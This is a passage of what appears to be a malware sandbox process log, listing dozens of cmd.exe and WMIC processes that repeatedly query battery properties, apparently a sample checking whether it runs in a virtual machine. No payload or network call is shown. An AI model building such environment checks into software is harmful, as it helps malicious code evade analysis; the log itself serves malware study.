C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4152

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3100

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2120

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1492

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3576

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3028

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1296

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1908

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4872

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4156

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:5084

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1528

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4008

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3732

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4436

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3708

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4992

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3544

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2188

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4196

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:5068

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3180

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1000

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:640

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1528

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:100

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4108

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4984

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1836

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1944

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1828

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2188

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3540

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:5068

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:204

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3344

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3024

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3856

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3668

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4260

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4988

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3100

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:5012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2820

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4264

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4688

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1716

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4680

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1668

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1892

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1008

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:5068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:996

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1384

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:1856

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2052

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:5056

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:3868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4332

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4804

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:4092

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:2520

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3136

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value"
3⤵
PID:3768

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic.exe Path Win32_Battery Get BatteryStatus, DesignCapacity, EstimatedChargeRemaining, DesignVoltage, FullChargeCapacity /value
4⤵
PID:1376

C:\Windows\system32\cmd.exe
